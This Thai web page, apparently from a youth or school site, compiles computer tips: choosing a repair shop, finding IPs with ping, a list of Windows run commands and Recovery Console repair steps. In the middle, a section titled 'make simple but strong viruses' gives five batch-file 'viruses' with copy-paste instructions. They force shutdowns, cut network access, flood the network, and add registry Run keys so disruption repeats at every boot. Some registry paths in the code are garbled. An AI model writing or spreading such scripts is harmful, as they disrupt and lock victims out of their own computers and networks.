5.ค้นหาบริการทางโทรศัพท์ บางกรณีอาจเป็นการไม่สะดวกที่จะเดินทางไปซ่อมที่ร้านโดยตรง การไปโทรศัพท์ไปปรึกษาจึงเป็นอีกทางเลือกหนึ่ง เมื่อคุณเริ่มโทรศัพท์หาร้านซ่อม ให้ลองสังเกตพฤติกรรมต่าง ๆ ที่คุณได้รับทางโทรศัพท์ เช่นต้องรอสายนานเท่าไร เต็มใจช่วยเหลือหรือไม่ แค่นี้ก็เป็นการช่วยตัดสินใจได้ว่า ควรซ่อมกับร้านนั้นหรือไม่ แล้วอย่าลืมจดชื่อรุ่นหรือ Serial Number ของคอมพิวเตอร์ไว้เพื่อความสะดวก หรือจะโทรไปรายการ 94 FM ทุกวันจันทร์-ศุกร์ เวลา 14:00-15:00 ที่นี้รับตอบปัญหาทุกเรื่องดีมากเลย

6.ค่าธรรมเนียม เมื่อยกเครื่องคอมพิวเตอร์ไปซ่อมเป็นธรรมดาที่ช่างจะสำรวจดูว่ามีอะไรบ้าง ที่ต้องซ่อม ตั้งแต่สายไฟยันฮาร์ดดิส ซึ่งร้านจำเป็นจะต้องคิดค่าธรรมเนียมในการตรวจสอบนี้ แต่ก็มีบางร้านเหมือนกัน ที่ไม่คิด แต่ถ้าคุณพอมีความรู้เรื่องเครื่องคอมพิวเตอร์อยู่บ้าง ก็อาจทดลองใช้โปรแกรม Norton Utility ตรวจสอบเครื่องของคุณก่อน บางที่อาจทำให้คุณไม่ต้องเสียเงินก็ได้ หรือบางที่คุณอาจโทรมาเรียกช่างมาซ่อม ที่บ้านก็ได้ แต่คุณจะต้องเสียเงินเพิ่มขึ้น

7.คิดในแง่ร้ายไว้ก่อน หลังจากที่เครื่องของคุณได้รับการตรวจสอบอาการจากหลาย ๆ ร้านซ่อมแล้ว ก็มาถึงขั้นตอนในการตัดสินใจว่า จะซ่อมหรือไม่ซ่อมในร้านใดจึงจะดี ซึ่งบางครั้งร้านซ่อมอาจจะบอกว่าเครื่อง ไม่อยู่ในประกันแล้วหรืออะไหล่ชิ้นที่ต้องการไม่มีอีกต่อไปแล้ว ข่าวร้ายเหล่านี้เป็นแคเพียงขั้นเริ่มต้นใน การซ่อมคอมพิวเตอร์ของคุณ บางที่คุณอาจลองสอบถามร้านดูว่าสามารถจะเอาอะไหล่เก่าไปแลกอะไหล่ใหม่ ได้หรือไม่ ในกรณีอะไหล่ชิ้นเก่าเลิกผลิตไปแล้ว โดยอาจต้องเพิ่มเงินเล็กน้อย

8.เตรียมเครื่องให้พร้อมก่อนนำไปซ่อม ก่อนที่จะทิ้งเครื่องเอาไว้ที่ร้านเพื่อทำการซ่อมลองตรวจสอบว่าคุณได้ แบ็กอัพข้อมูลที่สำคัญเอาไว้ , จด Serial number ของฮาร์ดิสก์ , ซีดีรอม , โมเด็ม และอื่น ๆ ไว้เพื่อตรวจสอบกับอุปกรณ์ที่นำมาเปลี่ยน ลบข้อมูลส่วนตัวออกให้หมดเช่น อินเตอร์เน็ทพาสเวิร์ด เพื่อป้องกันถูกลักลอบนำไปใช้

9..ขอเอกสารการซ่อมจากร้าน ก่อนที่จะทิ้งเครื่องเอาไว้ที่ร้านอย่าลืมขอเอกสารที่บอกถึงชิ้นส่วนที่จะ เปลี่ยน และระยะเวลาในการซ่อม ตรวจสอบเอกสารให้ละเอียดเพื่อป้องกันค่าใช้จ่านแอแฝง แล้วอย่าลืมถามถึงการ รับประกันหลังการซ่อม

10.ติดตามความคืบหน้า สิ่งสุดท้ายที่ต้องทำคือคอยโทรไปถามว่าการซ่อมไปถึงไหน เปลี่ยนอะไรบ้าง เสร็จทันกำหนดหรือไม่ และเมื่อไปรับเครื่อง ให้ทดสอบดูก่อนว่าเครื่องทำงานปกติหรือไม่ ก่อนนำเครื่องกลับ


ไปที่ run แล้วพิมพิ์ว่า cmd กด enter
หลังจากนั้นให้พิ์มว่า ping www.hi5.com
แค่นี้ก็จะทราบ ip ของ hi5 แล้ว

กรณีเราต้องการเข้าถึงข้อมูล หรือจะ Config ค่าต่างๆ หรือ Remote แต่ไม่รู้ Ip ของเครื่องตรงข้าม
เนื่องจากเป็น Ip Random (สุ่ม) ซึ่งมันจะจ่าย IP ไม่แน่นอนให้กับเครื่อง
วันนี้ผมมีวิธีง่ายๆที่จะเช็ค IP เครื่องตรงข้ามอย่างง่ายดาย
1.คลิ๊กที่ปุ่ม Start เลือก Run พิมพ์ Command>--กด OK
2.จะได้หน้าDos ขึ้นมา พิมพ์ คำสั่ง Ping ตามด้วย ชื่อเครื่องปลายทาง กด Enter
แค่นี้ก็ได้ IP เครื่องสำหรับทำการConfig ค่าต่างๆ หรือ Remote

Run โปรแกรม Accessibility Options >>> access.cpl
Run โปรแกรม Add Hardware>>> hdwwiz.cpl
Run โปรแกรม Add/Remove Programs>>> appwiz.cpl
Run โปรแกรม Administrative Tools control >>> admintools
ตั้งค่า Automatic Updates >>> wuaucpl.cpl
Run โปรแกรม Bluetooth Transfer Wizard >>> fsquirt
Run โปรแกรม เครื่องคิดเลข (Calculator) >>> calc
Run โปรแกรม Certificate Manager >>> certmgr.msc
Run โปรแกรม Character Map >>> charmap
Run โปรแกรม ตรวจสอบดิสก์ (Check Disk Utility)>>> chkdsk
ดูคลิปบอร์ด (Clipboard Viewer) >>> clipbrd
Run หน้าต่างดอส (Command Prompt) >>> cmd
Run โปรแกรม Component Services >>> dcomcnfg
Run โปรแกรม Computer Management >>> compmgmt.msc
ดู/ตั้ง เวลาและวันที่ >>> timedate.cpl
Run หน้าต่าง Device Manager >>> devmgmt.msc
ดูข้อมูล Direct X (Direct X Troubleshooter) >>> dxdiag
Run โปรแกรม Disk Cleanup Utility >>> cleanmgr
Run โปรแกรม Disk Defragment >>> dfrg.msc
Run โปรแกรม Disk Management >>> diskmgmt.msc
Run โปรแกรม Disk Partition Manager>>> diskpart
Run หน้าต่าง Display Properties control desktop >>> desk.cpl
Run หน้าต่าง Display Properties เพื่อปรับสีวินโดวส์ >>> control color
Run โปรแกรมช่วยแก้ไขปัญหา (Dr. Watson) >>> drwtsn32
Run โปรแกรมตรวจสอบไดร์ฟเวอร์ (Driver Verifier Utility) >>> verifier
ดูประวัติการทำงานของเครื่อง (Event Viewer) >>> eventvwr.msc
Run เครื่องมือตรวจสอบไฟล์ File Signature Verification Tool >>> sigverif
Run หน้าต่าง Folders Options control >>> folders
Run โปรแกรมจัดการ Fonts >>> control fonts
ไปยังโฟลเดอร์ Fonts (Fonts Folder)>>> fonts
Run เกม Free Cell >>> freecell
Run หน้าต่าง Game Controllers>>> joy.cpl
Run โปรแกรมแก้ไข Group Policy >>> gpedit.msc
Run โปรแกรมสร้างไฟล์ Setup (Iexpress Wizard) >>> iexpress
Runโปรแกรม Indexing Service>>> ciadv.msc
Run หน้าต่าง Internet Properties >>> inetcpl.cpl
Run หน้าต่าง Keyboard Properties >>> control keyboard
แก้ไขค่าความปลอดภัย (Local Security Settings) >>> secpol.msc
แก้ไขผู้ใช้ (Local Users and Groups)>>> lusrmgr.msc
คำสั่ง Log-off >>> logoff
Run หน้าต่าง Mouse Properties control mouse >>> main.cpl
Run หน้าต่าง Network Connections control netconnections >>> ncpa.cpl
Run หน้าต่าง Network Setup Wizard >>> netsetup.cpl
Run โปรแกรม Notepad >>> notepad
Run คีย์บอร์ดบนหน้าจอ >>> osk
Run หน้าต่าง Performance Monitor >>> perfmon.msc
Run หน้าต่าง Power Options Properties >>> powercfg.cpl
Run โปรแกรม Private Character Editor >>> eudcedit
Run หน้าต่าง Regional Settings >>> intl.cpl
Run หน้าต่าง Registry Editor >>> regedit
Run โปรแกรม Remote Desktop >>> mstsc
Run หน้าต่าง Removable Storage >>> ntmsmgr.msc
Run หน้าต่าง Removable Storage Operator Requests >>> ntmsoprq.msc
ดู Policy ที่ตั้งไว้ >>> rsop.msc
Run หน้าต่าง Scanners and Cameras >>> sticpl.cpl
Run โปรแกรม Scheduled Tasks control >>> schedtasks
Run หน้าต่าง Security Center >>> wscui.cpl
Run หน้าต่าง Services >>> services.msc
Run หน้าต่าง Shared Folders >>> fsmgmt.msc
คำสั่ง Shuts Down >>> shutdown
Run หน้าต่าง Sounds and Audio >>> mmsys.cpl
Run เกม Spider Solitare >>> spider
แก้ไขไฟล์ระบบ (System Configuration Editor) >>> sysedit
แก้ไขการตั้งค่าระบบ (System Configuration Utility) >>> msconfig
ตรวจสอบระบบด้วย System File Checker Utility >>> sfc /scannow
ตรวจสอบระบบด้วย System File Checker Utility >>> sfc /scanonce
Run หน้าต่าง System Properties >>> sysdm.cpl
Run หน้าต่าง Task Manager >>> taskmgr
Run หน้าต่าง User Account Management >>> nusrmgr.cpl
Run โปรแกรม Utility Manager >>> utilman
Run โปรแกรม Windows Firewall >>> firewall.cpl
Run โปรแกรม Windows Magnifier >>> magnify
Run หน้าต่าง Windows Management Infrastructure>>> wmimgmt.msc
Run หน้าต่าง Windows System Security Tool>>> syskey
Run ตัวอัพเดตวินโดวส์ (Windows Update)>>> wupdmgr
Run โปรแกรม Wordpad>>> write

สร้างไวรัสง่ายๆ แต่แรง!!

ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น

Code:
@echo off
TITLE Mr K~~~
shutdown -r -f -t0

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat

ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต
Code:
@echo off
TITLE Mr K~~~
ipconfig /release

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat

Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง

Code:
@echo off
TITLE Mr K~~~ :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat


Virus#4 Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตได้อีก - -
Code:
@echo off
break off
TITLE Mr K~~~
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSE

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat

Virus#5 สั่งปิดเครื่องทุกๆครั้งที่เปิดจนถึง11วินาที (เปิดแล้วก็ปิดอยู่อย่างนั้น)
code:
@echo off
break off
TITLE Mr K~~~
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE

ทั้งหมดนี่จะรันผ่าน Dos นะครับ อิอิ

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat
** วิธีแก้คือ กด Logo Windows + R แล้วพิมพ์ shutdown -a หรือ เข้า Safe mode ก็ได้ แล้วไปลบไฟล์ hartlell.bat ที่ c:windows คับ**
^
^

การ repair windows xp

1. บู๊ตด้วยแผ่น boot Windows XP
2. ระหว่างบู๊ตจะมีหน้าต่างแสดงด้านล่างให้กด ตัว R เพื่อเข้าระบบ (R=Repair) เราเรียกวิธีการนี้ว่า Recovery Console
3. จากนั้นรอสักพัก จะมีหน้าต่างให้เลือก partition ให้เลือก 1 C:\WINDOWS: หรือ
4. ถ้าไม่ได้มีหัวข้อให้เลือก ก็จะเข้า Drive C: เลย (เหมือนกับระบบ DOS)
5. จากนั้นพิมพ์คำสั่ง "CHKDSK /R" คำสังนี้จะทำการตรวจสอบดิกส์ และซ่อมให้อัตโนมัติ
6. รอจนกระทั่งเสร็จ 100% ทั้งนี้ ขึ้นกับปัญหาและขนาดของฮาร์ดดิกส์ว่าใหญ่ขนาดไหน สำหรับของผม 80 gb ก็ใช้เวลาประมาณ 10 กว่านาที
7. ถ้าต้องการให้แน่นอนมากขึ้น หลังจาก CHKDSK เสร็จแล้ว ให้พิมพ์คำสั่ง "fixboot" ด้วย
8. เสร็จแล้ว ให้พิมพ์คำสั่ง Exit เพื่อออกจาก Repair และ Restart Windows ใหม่

ทิป:: คำสั่งที่ให้พิมพ์นั้น จะเป็นตัวพิมพ์เล็กหรือใหญ่ก็ได้ทั้งนั้น


รู้จักกับการกู้ Windows XP ด้วย Recovery Console

Recovery Console จะคล้ายกับ Safe Mode ของ Windows 95/98/ME หากคอมพิวเตอร์ของเราไม่สามารถบูตเข้าวินโดวส์ได้ตามปกติ ก็สามารถบูตเข้าสู่โหมด Recovery Console แล้วกู้ระบบขึ้นมาให้ใช้งานได้เหมือนเดิม จุดที่แตกต่างของ Automated System Recovery (ASR) กับ Recovery Console ก็คือ ASR จะต้องมีการสำรองไฟล์ระบบไว้ก่อนล่วงหน้า แต่ Recovery Console ไม่จำเป็นต้องสำรองไฟล์ระบบไว้ก่อน (ซึ่งบางครั้งจึงไม่สามารถแก้ไขได้ 100%)วิธีการใช้งาน Recovery Consoleอันดับแรกเราต้องมีแผ่นติดตั้ง Windows XP และเมื่อเปิดเครื่องก็เลือกบูตเข้าไปที่ไดร์ฟซีดีเมื่อเปิดเครื่อง ขณะแสดงข้อความว่า Press any key to boot from CD... ให้กดปุ่มอะไรก็ได้ 1 ครั้งแล้วรอสักครู่จะพบกับหน้าจอ Windows XP Professional Setup

เมื่อบูตด้วยแผ่นติดตั้ง Windows XP ผู้ใช้สามารถกดปุ่ม R เพื่อเรียกเข้าไปยัง Recovery Console ได้เลยรอสักครู่จะปรากฏหน้าจอ Microsoft Windows XP(TM) Recovery Console และแสดงข้อความว่า Whick Windows installation would you like to log onto และข้อความข้างบนจะแสดงตำแหน่งไดร์ฟที่ได้ติดตั้ง Windows XP เอาไว้ ซึ่งโดยปกติจะแสดงเป็น 1: C:>WINDOWS

และทำตามขั้นตอนดังต่อไปนี้1.ที่หัวข้อ Whick Windows installation would you like to log onto (To cancel, press ENTER)? ใส่ค่าเป็นเลข 1 (ตัวเลขนี้จะบอกตำแหน่งของไดร์ฟที่ได้ติดตั้ง Windows XP เอาไว้2.ที่หัวข้อ Type the Administrator password: ใส่รหัสผ่านของผู้ควบคุมระบบ (Administrator) ซึ่งเป็นรหัสผ่านที่ได้ตั้งไว้ในขั้นตอนของการติดตั้ง Windows XP หรือถ้าหากท่านไม่ได้ใส่รหัสผ่านเอาไว้ก็กด Enter ผ่านไปได้เลย3.ที่หัวข้อ C:>WINDOWS> พิมพ์คำสั่ง HELP เพื่อให้ระบบแสดงคำสั่งที่สามารถใช้งานได้ในโหมดของ Recovery Console แล้วกด Enter

ต่อมาจะเป็นความหมายของคำสั่งต่างๆที่จำเป็นต้องใช้สำหรับ Recovery Console ซึ่งมีดังนี้คำสั่งสำหรับการจัดการไฟล์และโฟลเดอร์คำสั่ง CD หรือ CHDIRCD หรือ CHDIR ใช้สำหรับเปลี่ยนตำแหน่งของโฟลเดอร์ปัจจุบัน มีรูปแบบคำสั่งเป็น CD folder-name หรือ CHDIR folder-name โดย folder-name คือตำแหน่งโฟลเดอร์ที่จะไป ถ้าพิมพ์ CD... หรือ CHDIR... จะเป็นการออกไปที่โฟลเดอร์ก่อนหน้านี้หนึ่งขั้น คำสั่งนี้จะใช้งานได้กับโฟลเดอร์ของระบบเท่านั้น สำหรับการใช้งานร่วมกับชื่อไฟล์แบบยาว (ที่มีการเว้นวรรค) สามารถใช้เครื่องหมาย " " คร่อมชื่อไฟล์หรือโฟลเดอร์แบบยาวได้ทันทีคำสั่ง COPYCOPY ใช้สำเนาไฟล์ต่างๆมีรูปแบบ COPY source destination ซึ่ง source ก็คือตำแหน่งไฟล์ต้นทางและ destination ก็คือตำแหน่งปลายทางที่จะสำเนาไป ในการใช้งานคำสั่งนี้จะใช้เครื่องหมาย * และ ? อย่างที่คุ้นเคยกันโดยไม่ต้องพิมพ์ชื่อไฟล์และตำแหน่งเต็มอย่างถูกต้อง ทั้งยังไม่สามารถสำเนาไปยังสื่อที่เคลื่อนย้ายได้ (เช่น แผ่นดิสต์) และสำหรับการทำสำเนาไฟล์จากแผ่นซีดีติดตั้งวินโดวส์นั้น ไฟล์ที่ถูกสำเนาจะถูกขยายออกจากการบีบอัดทันทีคำสั่ง DEL หรือ DELETEDEL หรือ DELETE ใช้ลบไฟล์ที่ต้องการ มีรูปแบบ DELETE filename โดย filename จะเป็นตำแหน่งและชื่อของไฟล์ที่ต้องการจะลบทิ้ง คำสั่งนี้จะใช้ได้กับโฟลเดอร์ของระบบและสื่อที่เคลื่อนย้ายเท่านั้นคำสั่ง DIRDIR แสดงรายชื่อไฟล์และโฟลเดอร์ที่มีอยู่ในตำแหน่งปัจจุบัน โดยในส่วน attribute จะแสดงประเภทคือ D = โฟลเดอร์, H = ไฟล์ที่ซ่อนไว้, S = ไฟล์ระบบ, E = ไฟล์ที่เข้ารหัสไว้, R = ไฟล์ที่อ่านได้อย่างเดียว, A = ไฟล์ทั่วไป, C = ไฟล์ที่บีบอัดไว้ และ P = จุดต่อของไฟล์ (Reparse Point)คำสั่ง EXITEXIT ใช้ออกจากโหมด Recovery Console แล้วรีสตาร์ทเครื่องใหม่ทันที ด้วยการกด Ctrl+Alt+Delคำสั่ง MD หรือ MKDIRMD หรือ MKDIR ใช้สร้างโฟลเดอร์ขึ้นมาใหม่ มีรูปแบบ MD Folder-name หรือ MKDIR Folder-name ซึ่ง Folder-name ก็คือชื่อโฟลเดอร์ที่ต้องการจะสร้างขึ้นใหม่ คำสั่งนี้จะใช้งานได้เฉพาะภายในโฟลเดอร์ระบบและสื่อที่เคลื่อนย้าย (เช่น แผ่นดิสต์) เท่านั้นคำสั่ง RD หรือ RMDIRRD หรือ RMDIR ใช้ลบโฟลเดอร์ที่ต้องการ มีรูปแบบ RD Folder-name หรือ RMDIR Folder-name ซึ่ง Folder-name ก็คือชื่อโฟลเดอร์ที่ต้องการจะลบ คำสั่งนี้จะใช้งานได้เฉพาะภายในโฟลเดอร์ระบบและสื่อที่เคลื่อนย้าย (เช่น แผ่นดิสต์) เท่านั้นคำสั่ง REN หรือ RENAMEREN หรือ RENAME ใช้เปลี่ยนชื่อของไฟล์ คำสั่งนี้จะใช้งานได้เฉพาะภายในโฟลเดอร์ระบบและสื่อที่เคลื่อนย้าย (เช่น แผ่นดิสต์) เท่านั้นคำสั่งสำหรับการจัดการระบบบูตของวินโดวส์คำสั่ง FIXBOOTFIXBOOT ใช้แก้ไขไฟล์บูตระบบที่เสียหาย มีรูปแบบ FIXBOOT drive: ซึ่ง drive: ก็คือไดรว์ที่ต้องการให้สร้างไฟล์ระบบใหม่คำสั่ง FIXMBRFIXMBR ใช้แก้ไขบูตเร็คคอร์ดหลักของระบบ มีรูปแบบ FIXMBR device-name โดย device-name ก็คือชื่อของอุปกรณ์ที่จะต้องแก้ไขบูตเร็คคอร์ดหลัก (ใส่หรือไม่ใส่ก็ได้)คำสั่ง SYSTEMROOTSYSTEMROOT ใช้ตั้งตำแหน่งปัจจุบันให้เป็นตำแหน่งหลักของระบบ (ในการใช้คำสั่งนี้ จะต้องมั่นใจว่าตำแหน่งโฟลเดอร์ที่อยู่ปัจจุบันนั้น มีไฟล์ระบบที่ใช้สำหรับบูตวินโดวส์ด้วย มิฉะนั้นอาจส่งผลกับเครื่องได้)คำสั่งสำหรับการจัดการดิสต์และพาร์ทิชันคำสั่ง CHKDSKCHKDSK ใช้ตรวจสอบดิสต์ว่ามีพื้นที่หรือไฟล์ที่เสียหายหรือไม่ มีรูปแบบ CHKDSK drive: /P /R โดย /P คือสั่งให้ตรวจสอบทุกไดรว์ที่มีอยู่ในเครื่อง และ /R คือให้แสดงรายละเอียดตำแหน่งพื้นที่ที่เสีย (Bad Sector) และที่กู้ขึ้นมาด้วย ในการใช้งานคำสั่งนี้จำเป็นจะต้องมีไฟล์ Autochk.exe อยู่ที่โฟลเดอร์ระบบด้วย ถ้าไม่มีไฟล์นี้ตัวโปรแกรมจะหาจากแผ่นซีดี (หรือแผ่นดิสต์) ที่ใช้ติดตั้งโดยอัตโนมัติ ถ้ายังไม่พบอีก ก็จะแสดงข้อความผิดพลาดเพื่อให้ระบุตำแหน่งที่มีไฟล์ Autochk.exe เก็บอยู่คำสั่ง DISKPARTDISKPART ใช้จัดการกับพาร์ทิชันของฮาร์ดดิสตระบบ มีรูปแบบ DISKPART /add /delete device-name | drive-name | partition-name | size ซึ่ง /add ก็คือสร้างพาร์ทิชัน และ /delete คือลบพาร์ทิชันที่มีอยู่ ส่วน device-name เป็นชื่ออุปกรณ์ที่จะสร้าง/ลบ, drive-name คือตำแหน่งไดรว์(เช่น C:), partition-name คือชื่อของตำแหน่งพาร์ทิชัน โดยอาจจะพิมพ์ DISKPART อย่างเดียวก็ได้ แล้วจะแสดงโปรแกรมสำหรับจัดการพาร์ทิชันขึ้นมา ซึ่งจะง่ายกว่าการพิมพ์คำสั่งเองตรงๆคำสั่ง FORMATFORMAT ใช้สั่งฟอร์แมตดิสต์หรือฮาร์ดดิสต์ มีรูปแบบ FORMAT drive: /Q /FS:FAT | FAT32 | NTFS สำหรับ drive: ก็คือไดรว์ที่ต้องการฟอร์แมต, /Q คือสั่งให้ฟอร์แมตอย่างเร็ว (คล้ายกับการลบไฟล์ทั้งหมด) และ /FS: เป็นการสั่งให้ฟอร์แมตฮาร์ดดิสต์ด้วยรูปแบบไฟล์ประเภทใด คือแบบ FAT, แบบ FAT32 หรือแบบ NTFSคำสั่ง MAPMAP ใช้แสดงรายชื่อไดรว์ทั้งหมดที่เชื่อมต่ออยู่กับเครื่องคอมพิวเตอร์ สามารถใช้ MAP ARC ได้ด้วยเพื่อจะแสดงตำแหน่งฮาร์ดดิสต์เป็น multi(0)disk(0)rdisk(0)partition(1)

 

 

อาจารย์ อัศวิน ตราบนิรันดร

SPECIAL CORNER ++DOWNLOAD

 

สอนใช้โปรแกรมและบทความน่าอ่าน


หัวข้อเด็ดๆ หัวข้อโดนๆ ที่ทุกคนไม่ควรพลาด เนื้อหาอัดแน่น มีประโยชน์สุดๆ เหมาะสำหรับทุกคน ไม่ว่าจะเป็นมือใหม่ มือเก่า หรือมืออาชีพ รับประกันช่วยเพิ่มความรู้ ทั้งแบบมีสาระไม่มีสาระ ได้มากทีเดียว

Microsoft Office 2007 Tutorial สอนใช้ Office 2010
เรียนฟรี Microsoft Word, Excel, PowerPoint และ Outlook 2010

สินค้าไฮเทค Gadgets แนะนำสินค้าไฮเทค
สินค้าไฮเทค รู้จักไว้จะได้ไม่ตกเทรนด์
Microsoft Office 2007 Tutorial สอนใช้ Office 2007
เรียนฟรี Microsoft Word, Excel, PowerPoint และ Outlook 2007

Windows 7 Tutorial สอนใช้ Windows 7
แนะนำการใช้งาน Windows 7 ตั้งแต่ระดับพื้นฐานเป็นขั้นเป็นตอน รับรองใช้งานเป็นนอน
Microsoft Office 2007 Tutorial สอนใช้ Facebook
Social Network หรือสังคมออนไลน์ที่โด่งดังที่สุดในขณะนี้

Windows 7 Tutorial สอนใช้ Twitter
สอนใช้ Twitter อีกหนึ่ง Social Network ที่น่าใช้งานมาก
Adobe Photoshop Tutorial สอนใช้ Photoshop
โปรแกรมโฟโต้ช๊อป สุดยอดโปรแกรมตัดต่อภาพดีที่สุดในโลก
Web Guide
เว็บไกด์ยอดนิยม
แนะนำเว็บสุดฮอตฮิตชั้นนำของโลก เฉพาะเว็บมันส์ๆ เท่านั้น

Buying Guide  แนะนำเลือกซื้อสินค้า
ก่อนเลือกซื้อสินค้าไอทีอะไร เชิญเลือกอ่านคำแนะนำก่อน
Mobile Update  โมบายอัพเดท
ข้อมูลโทรศัพท์มือถือ ทิป เทคนิคการใช้โทรศัพท์ที่คุณอาจยังไม่รู้
Freeware Antivirus  ฟรีโปรแกรมแอนตี้ไวรัส
เชิญดาวน์โหลดฟรีโปรแกรมแอนตี้ไวรัส สปายแวร์
Freeware download  ฟรีแวร์ดาวน์โหลด
รวมมิตรฟรีแวร์แบบ 100% ให้ download ไปใช้งานได้จริง
Video Edition Tutorial สอนตัดต่อวีดีโอ/เพลง
สอนตัดต่อวีดีโอ และเพลง ด้วยหลากหลายโปรแกรม ฟรี!
Webmaster Guide สอนสร้างเว็บ
มาหัดสร้างเว็บกันดีกว่า เริ่มต้นจากพื้นฐานเลย พร้อมทิป เทคนิค

Editors' CHOICE


จาก Editor โดยตรง ขอแนะนำโปรแกรมขั้นเทพ แบบฟรีแวร์ที่สามารถ download ไปใช้งานได้ฟรีๆ ควรมีติดไว้ประจำเครื่องคอมพิวเตอร์ของคุณ เรียกได้ว่าเป็นยาสามัญประจำบ้านกันไปเลย รับประกันความผิดหวัง ไม่มีแน่นอน ! ทุกโปรแกรมผ่านการทดสอบและใช้งานมาแล้วทั้งสิ้น

ฟรีโปรแกรมกำจัดไวรัสและ
ระบบรักษาความปลอดภัย

  • avast! Antivirus
    ฟรีโปรแกรมป้องกันไวรัส/สปายแวร์
  • Stinger จาก Mcafee
    ฟรีเครื่องมือกำจัดไวรัสแบบไม่ติดตั้ง
  • AVG Rescue CD
    เครื่องมือประจำกายสำหรับกำจัดไวรัส
  • HouseCall
    ตรวจสอบไวรัสออนไลน์กับ Trend Micro
  • Combofix
    ล้างเครื่องคอมฯ ที่ติดไวรัสงอมแงม 

เครื่องมือเสริม เพิ่มพลังให้
คอมฯ ของคุณ ต้องมี!

  • CCleaner
    ลบขยะในเครื่องคอมฯ และช่วยถอดถอนโปรแกรม
  • Recuva
    กู้ไฟล์ทั้งบนคอมฯ และโทรศัพท์มือถือ เยี่ยม !
  • 7-Zip
    บีบอัดไฟล์/คลายไฟล์ได้ทุกประเภท
  • PDFCreator
    แปลงไฟล์อะไรก็ได้เป็น PDF ไฟล์
  • MarkView
    เปิดอ่านไฟล์ PDF ในรูปแบบ 3 มิติ เจ๋งสุด

เครื่องมือตกแต่งวีดีโอ เพลง
รูปภาพ ชั้นเซียน

  • Audacity
    ปรับแต่งแก้ไขไฟล์เสียง/เสียงดนตรี ระดับโลก 
  • IrfanView
    วิว/แก้ไข/แสดงรูปภาพ ได้เกือบทุกประเภท
  • Photo Story
    สร้างภาพให้มีชีวิตชีวา อย่างง่าย จาก Microsoft
  • Paint.Net
    เครื่องมือตกแต่งภาพน้องๆ Photoshop
  • Picasa
    โปรแกรมตกแต่งภาพง่ายๆ จาก Google

 

Search - ค้นหา

 

คำพ่อสอน

เด็ก ๆ นอกจากจะต้องเรียนความรู้แล้ว
ยังต้องหัดทำการงานและทำความดีด้วย
เพราะการทำงานจะช่วยให้มีความสามารถ มีความขยันอดทนพึ่งตนเองได้
และการทำดีนั้นจะช่วยให้มีความสุขความเจริญ ทั้งป้องกันตนไว้ไม่ให้ตกต่ำ

พระบรมราโชวาท พระราชทานเพื่อเชิญลงพิมพ์ในหนังสือวันเด็ก ประจำปี ๒๕๓๐


ศูนย์พิทักษ์พระพุทธศาสนาแห่งประเทศไทย
. . . . . . . . . . . ยุติความรุนแรง



รวมความประทับใจ จากค่ายสุดยอดผู้นำเยวชนไทยทำดีถวายในหลวง

โหลดไฟล์เอกสารวีดิโอเพลงและสื่อต่างๆ ที่เกี่ยวกับโครงงานคุณธรรมและโรงเรียนวิถีพุทธ ฟรี!! (คลิกที่ icon ด้านล่าง)

ตู้ ปณ. สื่อทำด้วยใจ สื่อใจด้วยธรรม - สื่อถึงกันดีๆ ไม่มีจำกัด

---------------------------------------------------------------------------------------

 


 

ข่าวสาร หนังสือพิมพ์(ต่างประเทศ)
ABC News I Asahi Shimbun I AP - Associated Press I BBC I Bangkok Shuho I CBS Sports Line I Chicago Tribune I CNET news I CNN I FOX News | Los Angeles Times I MSNBC I NBC I New York Time I Reuters | The Sun I Time.com I USA Today I Washington Post |

 
 
   ขอบคุณองค์กรที่ช่วยสนับสนุนกิจกรรมของเด็กและเยาวชน
 
drupal statistics
ศูนย์เฝ้าระวัง ติดตามพฤติกรรมเด็กและเยาวชน ในการเล่นอินเตอร์เน็ต การโพสข้อความ และรูปภาพในไฮไฟว์ เฟตบุ๊ค และ sms ในทางไม่เหมาะสม
หรือ พบเด็กและเยาวชนถูกกระทำทารุน ใช้แรงงานผิดกฎหมาย หรือ ไม่ได้รับความเป็นธรรมจากสถานศึกษา หรือหน่วยงานต่างๆ
